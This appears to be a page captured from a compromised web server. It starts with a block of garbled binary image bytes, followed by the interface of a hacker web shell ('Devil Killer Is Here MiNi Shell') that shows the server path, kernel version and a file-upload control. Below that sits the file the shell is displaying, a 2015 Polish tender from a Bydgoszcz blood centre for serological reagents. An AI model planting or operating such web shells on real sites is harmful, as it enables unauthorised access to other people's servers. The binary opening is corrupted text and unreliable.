JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150903/130773-N-2015.html

<p class="kh_header"><b>Bydgoszcz: Dostawa odczynników do badań serologicznych</b><br>
<b>Numer ogłoszenia: 130773 - 2015; data zamieszczenia: 03.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Krwiodawstwa i Krwiolecznictwa w Bydgoszczy , ul. Ks. Markwarta 8, 85-015 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3228636, faks 052 3228636.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rckik-bydgoszcz.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników do badań serologicznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa  odczynników do badań serologicznych.
2.	Zamawiający podzielił przedmiot zamówienia na 3 części zwane dalej pakietami, które zostały opisane szczegółowo w Załącznikach nr 4, 4A, 4B SIWZ, z zastrzeżeniem, iż oferta w każdym z pakietów musi być pełna.
Pakiet I 
odczynnik monoklonalny anty-A-klon I	400 ml
odczynnik monoklonalny anty-A-klon II	400 ml
odczynnik monoklonalny anty-B-klon I	400 ml
odczynnik monoklonalny anty-B-klon II	400 ml
odczynnik monoklonalny anty-c	100 ml
odczynnik monoklonalny anty-C      	105 ml
odczynnik monoklonalny anty-e      	50 ml
odczynnik monoklonalny anty-E     	105 ml
odczynnik monoklonalny anty-Cw   	150 ml
odczynnik monoklonalny anty-A1 (dopuszcza się również anty A1 lektynę) 30 ml
odczynnik monoklonalny anty -D IgM (niewykrywający antygenu D kategorii VI np.. RUM)	450 ml
odczynnik monoklonalny anty -D IgM + IgG  (wykrywający antygen D kategorii VI np. BLEND)	450 ml

Pakiet II
odczynnik poli lub monoklonalny anty-s	64 ml
odczynnik poli lub monoklonalny  anty-Fya       40 ml
odczynnik poli lub monoklonalny  anty-Fyb	40 ml
odczynnik monoklonalny anty-S	32 ml
odczynnik monoklonalny anty-K	55 ml
odczynnik monoklonalny anty-M	100 ml
odczynnik monoklonalny anty-N	92 ml
odczynnik monoklonalny anty-H	20 ml
odczynnik monoklonalny anty-Jka	60 ml
odczynnik monoklonalny anty-Jkb	50 ml
odczynnik monoklonalny anty-P1	80 ml
odczynnik poliklonalny anty-k	30 ml
odczynnik monoklonalny anty-k	100 ml
odczynnik monoklonalny anty Lea	94 ml
odczynnik monoklonalny anty Leb	94 ml

Pakiet III	
1.	Dostawa odczynników do badań serologicznych wykonywanych na analizatorach Techno Twin Station będących w posiadaniu Regionalnego Centrum Krwiodawstwa i Krwiolecznictwa w Bydgoszczy w ilości niezbędnej do wykonania niżej wymienionych badań:
     - grupa krwi w układzie AB0 i grupa krwi w układzie Rh w ilości niezbędnej do wykonywania min. 14400 badań (dawcy krwi)
     - kontrola serologiczna donacji w ilości niezbędnej do przeprowadzenia min. 550 badań (mikropłytki)
     - wykrywania p/c (PTA) - w formie kart - w ilości  6720 kart
     - BTA z odczynnikami antyglobulinowymi, monowalentnymi anty IgG, IgA, IgM, C3c, C3d - w formie kart - w ilości 72 kart
     - BTA z odczynnikiemi antyglobulinowymi, monowalentnymi anty IgG,  C3d - w formie kart - w ilości 120 kart
     - PTA z odczynnikiem monowalentnym  (IgG) - w formie kart - w ilości 1152 kart
     - dla noworodków AB0 Rh AHG- w ilości 1440 kart
     - wykrywania p/c w NaCl + enzym - w ilości 2160 kart
     - oznaczanie fenotypów Rh i antygenu K - karty  (p/c monoklonalne) - w ilości niezbędnej do wykonania minimum 864 badań
     - oznaczenie fenotypów Rh i antygenu K (mikropłytki)  w ilości  niezbędnej do przeprowadzenia minimum 380 badań
     - wykrywanie odmian antygenu D w PTA - Anty D ID-DiaClon ANTY -D weryfication of weak D   300 ml
2.	Dodatkowe odczynniki i materiały zużywalne w tym między innymi:
     - krwinki wzorcowe do grup AB0 (dawcy krwi) -  w ilości 6 zestawów w jednej dostawie
     -krwinki wzorcowe do wykrywania p/ciał  (dawcy krwi) - w ilości 4 opakowania w jednej dostawie
     - krwinki do identyfikacji p/ciał, panel 11 krwinkowy (11x4 ml) -  w ilości 48 zestawów, średnio 4 zestawy na miesiąc 
     -krwinki do identyfikacji p/ciał, panel 11 krwinek papainowych do testu enzymatycznego (11x4ml) -  w ilości 24 zestawy, 2 zestawy na miesiąc,
	  - krwinki do wykrywania p/ciał, (panel 3x10 ml) - w ilości 12 zestawów na rok, 1 zestaw na miesiąc,
     - zestawy do codziennej kontroli jakości odczynników- w ilości 2 zestawów w dostawie, 
     - odczynnik LISS - w ilości 18 litrów, a`500 ml
     - bromelina - w ilości 11 litrów, a`500 ml
     - sól płucząca - dwa rodzaje w łącznej  ilości 60 opakowań (A-40, B-20)
     - magnesy do mieszania zawiesin krwinek - 4 opakowań
     - odczynniki niezbędne do wykonania w/w badań muszą być w formie kart lub mikropłytek.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.61.00-6, 33.69.62.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych warunków w tym  zakresie. Potwierdzeniem spełnienia tego warunku będzie złożone przez Wykonawcę oświadczenie, którego wzór stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych warunków w tym  zakresie. Potwierdzeniem spełnienia tego warunku będzie złożone przez Wykonawcę oświadczenie, którego wzór stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych warunków w tym  zakresie. Potwierdzeniem spełnienia tego warunku będzie złożone przez Wykonawcę oświadczenie, którego wzór stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych warunków w tym  zakresie. Potwierdzeniem spełnienia tego warunku będzie złożone przez Wykonawcę oświadczenie, którego wzór stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych warunków w tym  zakresie. Potwierdzeniem spełnienia tego warunku będzie złożone przez Wykonawcę oświadczenie, którego wzór stanowi załącznik nr 1 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że  oferowany przedmiot zamówienia odpowiada wymaganiom określonym przez Zamawiającego,  należy przedłożyć wraz z ofertą: 
-  opis przedmiotu zamówienia stanowiący załącznik nr 4 i/lub 4A i/lub 4B do SIWZ.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony dopuszczają zmiany postanowień umowy w stosunku do treści oferty, na podstawie której  dokonano wyboru Wykonawcy, w sytuacji obiektywnej konieczności wprowadzenia zmiany,  zgodnie z art. 144 ust. 1 ustawy, w niżej przedstawionym zakresie, z zastrzeżeniem art. 140 ust. 1 i  3 ustawy:
1.1 	zmiana wartości umowy:
   	-	jeżeli po dacie podpisania umowy nastąpią jakiekolwiek zmiany w podatku VAT, które podwyższą lub obniżą cenę, to w zależności od rodzaju zmian jakie będą miały miejsce zostanie stosownie obniżona lub podwyższona wartość przedmiotu umowy.
   	- 	  dopuszcza się możliwość zmiany wartości umowy gdy nastąpi zmiana asortymentu  ale łączna wartość umowy nie może być wyższa niż pierwotnie oferowano;
1.2		zmiany cen na korzyść Zamawiającego na skutek udzielonych rabatów, promocji, zmiany kursów walutowych,
1.3		zmiana danych Wykonawcy (np.: zmiana siedziby, adresu, nazwy) lub zmiana wynikająca z przekształcenia podmiotowego po stronie Wykonawcy np.: w formie sukcesji uniwersalnej,
1.4	zmiana asortymentu:
-	dopuszcza się możliwość zastąpienia oferowanych odczynników innymi odczynnikami, które będą spełniać wszystkie przedstawione w SIWZ wymagania a dodatkowo ze względu na zmiany produkcyjne czy technologiczne jakość produkowanych odczynników okaże się nie gorsza niż pierwotnie oferowano (wprowadzony zostanie do sprzedaży przez wykonawcę produkt zmodyfikowany czy udoskonalony)
-    dopuszcza się możliwość zmian w obrębie ilości poszczególnego asortymentu (zmniejszenie jednego a zwiększenie drugiego itp.) - zmiana ta może być związana ze zmianą przepisów obowiązujących w polskim krwiodawstwie, zmianą wykonywanych procedur medycznych, różnego - nierównomiernego wykorzystania poszczególnych odczynników 
2.  Zamawiający zastrzega sobie również możliwość zmiany, z zastrzeżeniem art. 140 ust. 1 i 3 ustawy   Prawo zamówień publicznych, w przypadku:
2.1	zmiany w obowiązujących przepisach prawa mające wpływ na przedmiot i warunki umowy oraz zmiana sytuacji prawnej lub faktycznej Wykonawcy i, lub Zamawiającego skutkująca nie możliwością realizacji przedmiotu umowy;
2.2 	powstanie nadzwyczajnych okoliczności będących siłą wyższą skutkujących niemożliwością realizacji przedmiotu umowy lub grożącą rażącą stratą, których Strony nie przewidziały przy zawarciu umowy;
2.3	powstania nadzwyczajnych okoliczności nie będących siła wyższą, grożących rażącą stratą, których strony nie przewidziały przy zawarciu umowy.
3.	Wyżej wymienione zmiany mogą być dokonane na wniosek Zamawiającego lub Wykonawcy, za zgodą obu stron i zostaną wprowadzone do umowy w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.rckik-bydgoszcz.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Krwiodawstwa i Krwiolecznictwa w Bydgoszcz, ul. Ks. Markwarta 8, 85-015 Bydgoszcz..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2015 godzina 10:00, miejsce: Regionalne Centrum Krwiodawstwa i Krwiolecznictwa w Bydgoszcz, ul. Ks. Markwarta 8, 85-015 Bydgoszcz, pokój 230.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje możliwości zawarcia umowy ramowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I - Odczynniki do badań serologicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa  odczynników do badań serologicznych.
odczynnik monoklonalny anty-A-klon I	 400
odczynnik monoklonalny anty-A-klon II 	400
odczynnik monoklonalny anty-B-klon I	400
odczynnik monoklonalny anty-B-klon II	400
odczynnik monoklonalny anty-c	100
odczynnik monoklonalny anty-C      	105
odczynnik monoklonalny anty-e      50
odczynnik monoklonalny anty-E                                                      	105
odczynnik monoklonalny anty-Cw                                                      	150
odczynnik monoklonalny anty-A1 (dopuszcza się również anty A1 lektynę)  	30
odczynnik monoklonalny anty -D IgM (niewykrywający antygenu D kategorii VI np.. RUM)	450
odczynnik monoklonalny anty -D IgM + IgG  (wykrywający antygen D kategorii VI np. BLEND)	450.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.61.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet II - Dostawa odczynników do badań serologicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa  odczynników do badań serologicznych
odczynnik poli lub monoklonalny anty-s	64
odczynnik poli lub monoklonalny  anty-Fya          	40
odczynnik poli lub monoklonalny  anty-Fyb	40
odczynnik monoklonalny anty-S	32
odczynnik monoklonalny anty-K	55
odczynnik monoklonalny anty-M	100
odczynnik monoklonalny anty-N	92
odczynnik monoklonalny anty-H	20
odczynnik monoklonalny anty-Jka	60
odczynnik monoklonalny anty-Jkb	50
odczynnik monoklonalny anty-P1	80
odczynnik poliklonalny anty-k	30
odczynnik monoklonalny anty-k	100
odczynnik monoklonalny anty Lea	94
odczynnik monoklonalny anty Leb	94.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.61.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet III - Dostawa dostawa  odczynników do badań serologicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa odczynników do badań serologicznych wykonywanych na analizatorach Techno Twin Station będących w posiadaniu Regionalnego Centrum Krwiodawstwa i Krwiolecznictwa w Bydgoszczy w ilości niezbędnej do wykonania niżej wymienionych badań:
     - grupa krwi w układzie AB0 i grupa krwi w układzie Rh w ilości niezbędnej do wykonywania min. 14400 badań (dawcy krwi)
     - kontrola serologiczna donacji w ilości niezbędnej do przeprowadzenia min. 550 badań (mikropłytki)
     - wykrywania p/c (PTA) - w formie kart - w ilości  6720 kart
     - BTA z odczynnikami antyglobulinowymi, monowalentnymi anty IgG, IgA, IgM, C3c, C3d - w formie kart - w ilości 72 kart
     - BTA z odczynnikiemi antyglobulinowymi, monowalentnymi anty IgG,  C3d - w formie kart - w ilości 120 kart
     - PTA z odczynnikiem monowalentnym  (IgG) - w formie kart - w ilości 1152 kart
     - dla noworodków AB0 Rh AHG- w ilości 1440 kart
     - wykrywania p/c w NaCl + enzym - w ilości 2160 kart
     - oznaczanie fenotypów Rh i antygenu K - karty  (p/c monoklonalne) - w ilości niezbędnej do wykonania minimum 864 badań
     - oznaczenie fenotypów Rh i antygenu K (mikropłytki)  w ilości  niezbędnej do przeprowadzenia minimum 380 badań
     - wykrywanie odmian antygenu D w PTA - Anty D ID-DiaClon ANTY -D weryfication of weak D   300 ml
2.	Dodatkowe odczynniki i materiały zużywalne w tym między innymi:
     - krwinki wzorcowe do grup AB0 (dawcy krwi) -  w ilości 6 zestawów w jednej dostawie
     -krwinki wzorcowe do wykrywania p/ciał  (dawcy krwi) - w ilości 4 opakowania w jednej dostawie
     - krwinki do identyfikacji p/ciał, panel 11 krwinkowy (11x4 ml) -  w ilości 48 zestawów, średnio 4 zestawy na miesiąc 
